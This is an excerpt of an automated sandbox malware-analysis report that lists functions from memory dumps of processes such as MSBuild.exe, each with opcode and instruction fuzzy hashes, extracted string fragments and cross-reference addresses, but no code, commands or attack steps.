Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be20fe656974fca70ce818e86034514a5e1b6aa9fe79b7c89880c7587b28c118
Instruction ID: 8ada305a6917617da1065e2927939678ec1fa49405210e18117c59010a3154d9
Opcode Fuzzy Hash: be20fe656974fca70ce818e86034514a5e1b6aa9fe79b7c89880c7587b28c118
Instruction Fuzzy Hash: 4BE04F3070D5018BE758BA14C4556797353E7F2761F108A3AC41AD72D6DE68A4628B88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40875 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde2a4a111d73b59fcba2b1b2759d004603d26344ccdf25aadc75c2aacce3d04
Instruction ID: 6e6e179adc0083c80d9b575b8620799f630acd6ff49eca5f93b46acd67dc2352
Opcode Fuzzy Hash: dde2a4a111d73b59fcba2b1b2759d004603d26344ccdf25aadc75c2aacce3d04
Instruction Fuzzy Hash: 4ED05E32C4E6CC5EDB63372868610E87F60EFD2654F4501B3ED9849093EA596A288682

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42C83 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541e1541389699ffe85d77454d0b9912d4ee03aa893ceeaf1d294225bb267286
Instruction ID: aaf3fadefe4d5e10a91cd398caeba24a4cd57bdd0a463d944568abaa20ab0233
Opcode Fuzzy Hash: 541e1541389699ffe85d77454d0b9912d4ee03aa893ceeaf1d294225bb267286
Instruction Fuzzy Hash: D3E04F312086058FE365BB60D8406A532A5EB61351F240A3BC806D72E1DF2CE540CA05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40F1C Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3074de5f08397d6aca725080254573c2c66451e54b9cce11b09b18d321271d
Instruction ID: 17d6cbc0c9a36b6dce00a02039f842f1ec858d312b1aa5d020e0eb044d05f38e
Opcode Fuzzy Hash: fc3074de5f08397d6aca725080254573c2c66451e54b9cce11b09b18d321271d
Instruction Fuzzy Hash: E4C0123245F7D60EDB0632782C6A4D06F90D967820B8945FEC084CB2D3D58F144E8311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F416DD Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320927c4e267df0b37f9d53322060309810537e34ae88596cc16616034242397
Instruction ID: 2663db4d0d9deabed879f2f0c5bccce47773d0e11aaa372b4992df549a1203ea
Opcode Fuzzy Hash: 320927c4e267df0b37f9d53322060309810537e34ae88596cc16616034242397
Instruction Fuzzy Hash: 4CC048B378EA190D754C284CBC030F8B3C0C683171680267FEA8B819A7A84B64A70089

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F41C4F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621f6c674eded2813456e63b7a073960318f5d8543c7c38320d04383389830e2
Instruction ID: d2c4b71dcc6f84a64fccb2af0932977651a60cbe8df5c78efc221a8931d96a10
Opcode Fuzzy Hash: 621f6c674eded2813456e63b7a073960318f5d8543c7c38320d04383389830e2
Instruction Fuzzy Hash: 26E0B63160C41A8FFB54FB50C864DE973A2EBA0751F20457AC50AD72E6EE28A9818648

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF848F48BFA
K_^, xrefs: 00007FF848F48C12
K_^, xrefs: 00007FF848F48C72
K_^, xrefs: 00007FF848F48C2A

Memory Dump Source

Source File: 00000000.00000002.2334785734.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_Pnihosiyvr.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-1846792941
Opcode ID: 9f81c53c6445f58a44208f87e3f9fdbb724360bdea36adf6105154f0ca912dd0
Instruction ID: 7cb9ac301dfe9d013c35e23842c7ffbea11eca67071d719ae757e97926737351
Opcode Fuzzy Hash: 9f81c53c6445f58a44208f87e3f9fdbb724360bdea36adf6105154f0ca912dd0
Instruction Fuzzy Hash: B421C5B290D1816FDB46A72D8C854D13BF0FF2225CB4D01F6D05CDF2A3FA19A9068359

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 2128, Parent PID: 6180COMMON

Executed Functions

Function 00007FF848F4176A Relevance: 10.1, Strings: 8, Instructions: 120COMMON

Download Yara Rule

Strings

xJH, xrefs: 00007FF848F417D4
X[;, xrefs: 00007FF848F417AD
X[;, xrefs: 00007FF848F4180F
X[;, xrefs: 00007FF848F417E8
xJH, xrefs: 00007FF848F417FB
X~;*, xrefs: 00007FF848F4186B
X~;*, xrefs: 00007FF848F4183A
xJH, xrefs: 00007FF848F41799

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: X[;$X[;$X[;$X~;*$X~;*$xJH$xJH$xJH
API String ID: 0-2283547772
Opcode ID: 79a01f5c66bc6d72db078f5d5427d1914b61f6059bd97f4f24806e24b1d1d4f1
Instruction ID: ac97e4520a6616b6a1ea7da86fd075f0dfc92306e89c1cc21551fa7e3d6b6ce1
Opcode Fuzzy Hash: 79a01f5c66bc6d72db078f5d5427d1914b61f6059bd97f4f24806e24b1d1d4f1
Instruction Fuzzy Hash: 13414532A0D99D9FD709E7A894565F8BBA0FF56390F1401FFC04E9B0D2DB292882C345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42466 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

x6;, xrefs: 00007FF848F424E5
x6;, xrefs: 00007FF848F424B9

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: x6;$x6;
API String ID: 0-3971455788
Opcode ID: ff2ed6ff65403bd7a0ce94e52eeb081b576ccafbac23e9e9e46a1be13a8f7a7e
Instruction ID: ee233b6f289a11f1dc94b8257f7ecefdcc54a7cf5e95014cccedbfc124834e4e
Opcode Fuzzy Hash: ff2ed6ff65403bd7a0ce94e52eeb081b576ccafbac23e9e9e46a1be13a8f7a7e
Instruction Fuzzy Hash: 9621BB7090995C9FCF95EB6CD495E9CBFF0FF5A310B5500DAE049DB262CA25AC82CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40C0B Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

P[;, xrefs: 00007FF848F40C1A

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: P[;
API String ID: 0-1391560220
Opcode ID: 4b6678f5e116912533be3aa7b83eb6be7135c5efc68375cfc28a81d0b768b2a7
Instruction ID: dcfeb5c559c47e17812f75f967317b0169ccd127cb3c44f06e0bf2cb5f3513ba
Opcode Fuzzy Hash: 4b6678f5e116912533be3aa7b83eb6be7135c5efc68375cfc28a81d0b768b2a7
Instruction Fuzzy Hash: 67E02B11C5C9CD4EDE8467EC38399F47BD0FE956517640197C08AD70D7CF4824438655

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42206 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579a56e3e93c01bf74e8f1ab8b522eacebcd3ed8f5f2c6f4cd5d92becc750d35
Instruction ID: a37fde0f1f19a63aaa4659673e3493890bd09adb9d7b1109537d2f8a66ea82a5
Opcode Fuzzy Hash: 579a56e3e93c01bf74e8f1ab8b522eacebcd3ed8f5f2c6f4cd5d92becc750d35
Instruction Fuzzy Hash: 5C315C7090D68C9FDB51EBA8C8556ED7FB0FF29311F0401AAD448E71A2DB28A545C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F423B2 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754616a75a1001a6fc0fcb15013065c1fca0398db0462b2110fa6572182018e4
Instruction ID: af78b24adfa179ecf27620d3e8b60dded00fbbf0a48c8a079e29bed5148aeab0
Opcode Fuzzy Hash: 754616a75a1001a6fc0fcb15013065c1fca0398db0462b2110fa6572182018e4
Instruction Fuzzy Hash: 70212170D0DA4D8FDF85EBA8D499AACBBF1FF69300F54006AD449E7292DB349842CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42233 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57561ebb31d87d5a8fd16cf7adbb730b22be075a360ba181a1b9cf9d86fe1f74
Instruction ID: 039630fe9ed3b6043d32216bf72bbe4447821bc3347cb1cf68dc0e01da7126f9
Opcode Fuzzy Hash: 57561ebb31d87d5a8fd16cf7adbb730b22be075a360ba181a1b9cf9d86fe1f74
Instruction Fuzzy Hash: EF216D70D1990D9FEF81EBA8C859AEDBBF0FF69311F04057AE408E3292DB3499418B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42268 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de93c4ebeac5b32d6c27751a4179d7a6a3f3ea74686b4c366187931a76d9f316
Instruction ID: fefd745109573fbf266ee3f6c43c3be47d25b6342c99cac6dd9eb5c4a10439ee
Opcode Fuzzy Hash: de93c4ebeac5b32d6c27751a4179d7a6a3f3ea74686b4c366187931a76d9f316
Instruction Fuzzy Hash: 1F213770D1894D9FEF81EBA8C859AEDBBF0FF68311F04057AE409E3291DB34A9418B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F42312 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0504aad6753621cd59675af951f7729c6c8806f250949c1656f7a5162fa550a
Instruction ID: f828faa33b81c853471ce40edf14762526ae9f4d5384cce8f034387d97949116
Opcode Fuzzy Hash: a0504aad6753621cd59675af951f7729c6c8806f250949c1656f7a5162fa550a
Instruction Fuzzy Hash: DB11703080DAC99FE755ABA498653A97BB2FF96350F0400BBD449EB2D2DF781445C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40C5F Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b71897ef02f847f57b4952750531d11f0ff606764c12c2b33dacea881021b7
Instruction ID: ffb16d1dc15706b7203fcd0885674e8c74001ad96c7cdc4db68a47aff4b30f95
Opcode Fuzzy Hash: 69b71897ef02f847f57b4952750531d11f0ff606764c12c2b33dacea881021b7
Instruction Fuzzy Hash: 9E01C871D5990D9EEAC8FB58F855ABC73A5FFA4A50F400136E84DE22D3DF1428828A54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40CF7 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd8d51af58b87a88bc7c532506e707a19f952bbb9114c6e3ab5ebd5ddc3679
Instruction ID: 2f88567a88a5215ea96a97cc313daf4ce2dc3aa7f44eadcbf97b3af8457691e1
Opcode Fuzzy Hash: 11cd8d51af58b87a88bc7c532506e707a19f952bbb9114c6e3ab5ebd5ddc3679
Instruction Fuzzy Hash: E2F01D71E1C94D8EEBC4FB98A8565BCB3A0FFA4B80F400136C80DE71DBDE5528428A54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40F81 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe536432ac32e66baeb09bb70976a534bbaf5cfbb94b36a1d51f942fa0646cc5
Instruction ID: 567fc56deb459ce2c43d304ae3b5cffc3ca100c40a6164dd8fb0c3fdb40a2bc5
Opcode Fuzzy Hash: fe536432ac32e66baeb09bb70976a534bbaf5cfbb94b36a1d51f942fa0646cc5
Instruction Fuzzy Hash: 73E0E570909A9C9FDB90EB28C859B99BBF1EF59300F1440DAC44DD7261DB345A85CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F40C39 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de78f77924832edf0f257e1d548ccba29eaeab1ca9336b500c832f3c04aa16f9
Instruction ID: a2829018711c602d68b36987c3bdb142253080d0be29969eb94498d45aacb4db
Opcode Fuzzy Hash: de78f77924832edf0f257e1d548ccba29eaeab1ca9336b500c832f3c04aa16f9
Instruction Fuzzy Hash: 47D09E72D0C80D8EE6C4F758A4555FC67A5EB98660F551036C809F21D6DE1418828664

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F41885 Relevance: 10.2, Strings: 8, Instructions: 163COMMON

Download Yara Rule

Strings

xJH, xrefs: 00007FF848F41939
`[;, xrefs: 00007FF848F41988
X~;*, xrefs: 00007FF848F419DA
xJH, xrefs: 00007FF848F4199B
xJH, xrefs: 00007FF848F41974
`[;, xrefs: 00007FF848F4194D
X~;*, xrefs: 00007FF848F418F0
`[;, xrefs: 00007FF848F419AF

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: X~;*$X~;*$`[;$`[;$`[;$xJH$xJH$xJH
API String ID: 0-1123803515
Opcode ID: 08dc6b3ae39dc99d840be9ce032dfbf7d73de2aa6aefbce00501f087e4f4e9e9
Instruction ID: 5aefdebea5c92683aefeb24dee61b1383c7a908f74726f2b50e26b6edf01dfc8
Opcode Fuzzy Hash: 08dc6b3ae39dc99d840be9ce032dfbf7d73de2aa6aefbce00501f087e4f4e9e9
Instruction Fuzzy Hash: 55513432D0DA9D8FD70AA76898265F97BA0EF56790F0801FFD049DB0D2CB2C5886C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F4045D Relevance: 6.5, Strings: 5, Instructions: 227COMMON

Download Yara Rule

Strings

peH, xrefs: 00007FF848F404D1
(eH, xrefs: 00007FF848F404C1
HfH, xrefs: 00007FF848F40501
dH, xrefs: 00007FF848F404B1
HbH, xrefs: 00007FF848F404A1

Memory Dump Source

Source File: 00000003.00000002.2522166355.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f40000_MSBuild.jbxd

Similarity

API ID:
String ID: (eH$HbH$HfH$peH$dH
API String ID: 0-3493289530
Opcode ID: 3ee721ea93a3a25aa7d880296d5c49b1934751fc2dfc2206d19df72b23df24a2
Instruction ID: 7daeeee111a75c6fccaa2096d47e03b72a8443a4ba936288d9d0841b69440de2
Opcode Fuzzy Hash: 3ee721ea93a3a25aa7d880296d5c49b1934751fc2dfc2206d19df72b23df24a2
Instruction Fuzzy Hash: 3851DA13E0F9D29FE29573BC78161F56F90EFD2AA4B1C42B7D0884F0DB591C5C1A829A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sssssssssssssssss.exePID: 6136, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848F22E70 Relevance: 1.5, Instructions: 1533COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70255a9ebffa899f9ce5ebe08c26fd031b367c0cb1a01b89fd8cfc6525bd5e0
Instruction ID: f150980ca08cdfb1dfe6a31248036a5d0aff7427020df9cfb0346db37f13c4da
Opcode Fuzzy Hash: a70255a9ebffa899f9ce5ebe08c26fd031b367c0cb1a01b89fd8cfc6525bd5e0
Instruction Fuzzy Hash: 63C2847061DA488FD30BDB28D064A653B71FF86344FA445EDC40ACB7E6CA3B6846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F275D3 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2c9d70ff2de58ea1c212b44a820c0fbe0f24d55f6c5b3871831b6382080bce
Instruction ID: a0071ec6510f7064b6ff2215f649151d43c1e8794c67a2ed2b272d374726818a
Opcode Fuzzy Hash: 6c2c9d70ff2de58ea1c212b44a820c0fbe0f24d55f6c5b3871831b6382080bce
Instruction Fuzzy Hash: 66D10531A0DB854FE756AB3898152A87BE1EF4B350F1502FAD089C72D3DF28AC46C756

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F213A8 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e27c638dff313fc26bc9dcb71c82893fb3ea319f5fb034140474ffe6179684
Instruction ID: df9fe836267b4e37ed1babc853ce5aa7aa27912d82651ab601d99b692d2e752c
Opcode Fuzzy Hash: 70e27c638dff313fc26bc9dcb71c82893fb3ea319f5fb034140474ffe6179684
Instruction Fuzzy Hash: F551333190D7C58FE356AB7848655727FE0EF07260F0902FED08AC71E3DE19A886835A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491D1520 Relevance: 2.3, Strings: 1, Instructions: 1090COMMON

Download Yara Rule

Strings

&#_H, xrefs: 00007FF8491D1653

Memory Dump Source

Source File: 00000008.00000002.2785420753.00007FF8491D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8491d0000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID: &#_H
API String ID: 0-3677511550
Opcode ID: c3063286874333a3f2aceee59ac776b3afe3657a3b55532a2bcd5e26ad8dbecf
Instruction ID: 5f6f787deda26455c0e7a7fa0d4430b05f78a604f2aa1c84f4d9d845d3cab75d
Opcode Fuzzy Hash: c3063286874333a3f2aceee59ac776b3afe3657a3b55532a2bcd5e26ad8dbecf
Instruction Fuzzy Hash: 40824E71E1CA9A9FEBA9EF58D885BE977B5FF68340F0402B5C009D3195DB3878458B80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F205B8 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

HAH, xrefs: 00007FF848F22038

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID: HAH
API String ID: 0-1579723087
Opcode ID: 49f689eda902e619a99955e7ddf167c8d2e095ef1eb99770e4b353cfd03d0580
Instruction ID: f6c009702ed5c983175e7f200faf5bf6e619eaddccd5bc5cfbb7b5bf07cb92a6
Opcode Fuzzy Hash: 49f689eda902e619a99955e7ddf167c8d2e095ef1eb99770e4b353cfd03d0580
Instruction Fuzzy Hash: 85612630B0DA894FE38AEB2C5855675BBE2EF86250B0941BBD04DC72E2DF299C05C315

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8491D200D Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2785420753.00007FF8491D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8491D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8491d0000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09861a4ed94614e24068549b6b38ead6da638be1d28b17c7fc4c91b36d7df2af
Instruction ID: 56a2ff1372f88f8c98c01426a0a3bdb7d537ecb83ee26d2237621d3b870e0def
Opcode Fuzzy Hash: 09861a4ed94614e24068549b6b38ead6da638be1d28b17c7fc4c91b36d7df2af
Instruction Fuzzy Hash: 69121730D0C65A8FEBA5EF68D495BBD7BB5FF59340F5005B9D01D93292CA396881CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2196D Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee1721c17fd77d1296c9a93e98e2596ed6fa9e31c979b17eb11fb6a55f205852
Instruction ID: 11b0c24485566896d24b66ffa72222f32fcdb6dc312e6d7ac2a6e1ffa5376d11
Opcode Fuzzy Hash: ee1721c17fd77d1296c9a93e98e2596ed6fa9e31c979b17eb11fb6a55f205852
Instruction Fuzzy Hash: 65A15031A0C94D8FEB98FB98D465ABC77E2EF98341F150179D40EC72D6DE29AC428748

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20A5D Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003991c6821ebedd32d5803b2387afaec8bcf722326a479dd0fe9e05e23187ec
Instruction ID: e5ef5f69e9e9761d3f6b8715d76703037cc1c8e3e1bcf3ec75faa9479cc74712
Opcode Fuzzy Hash: 003991c6821ebedd32d5803b2387afaec8bcf722326a479dd0fe9e05e23187ec
Instruction Fuzzy Hash: 75719F32E1C9094FEB88FB68A45A6BD77E1FF98341F50007AE40DD72D2DE2A6C428745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2106D Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657e568d1ec95bf581e370bee6ddb650e88b95bf9d94f52e0f9ae58dd8faa468
Instruction ID: 35d8c450cab293afe0619e6d432eec6e159c5a5b1e5187596622ea7598dbf5e3
Opcode Fuzzy Hash: 657e568d1ec95bf581e370bee6ddb650e88b95bf9d94f52e0f9ae58dd8faa468
Instruction Fuzzy Hash: E471093090EA868FE759E77894556753BE0EF56380F1400FAD44ACB2E3DE1EAC81C369

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20638 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4e51b705a60de11c36c28d73ba626e56293ad71f827275e941800e69cd48d44
Instruction ID: 43d859ea4d877efbf29daec38727ee8368b7d7fe7d92cba6aa6468ac7f4e28bd
Opcode Fuzzy Hash: e4e51b705a60de11c36c28d73ba626e56293ad71f827275e941800e69cd48d44
Instruction Fuzzy Hash: 73812B3090DB864FE726EB28D441676BBE0FFA2350F1405BEC48AC71D2DB69B885C756

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F25074 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2781796113.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848f20000_sssssssssssssssss.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a35ffda9cb7afbe4e12e76edbddadf1cff749f7f3d9bf13c207cb574361574
Instruction ID: ca09fce557615d9fdd66ebf7ea61bfb13e85a505d61cb061e57e1a2a58779375
Opcode Fuzzy Hash: 20a35ffda9cb7afbe4e12e76edbddadf1cff749f7f3d9bf13c207cb574361574
Instruction Fuzzy Hash: 7251FF30B1DA498FE389EB2C544A239B7D1EF99341F5442BAD40DC72E3DE29AC458716

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F204B0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

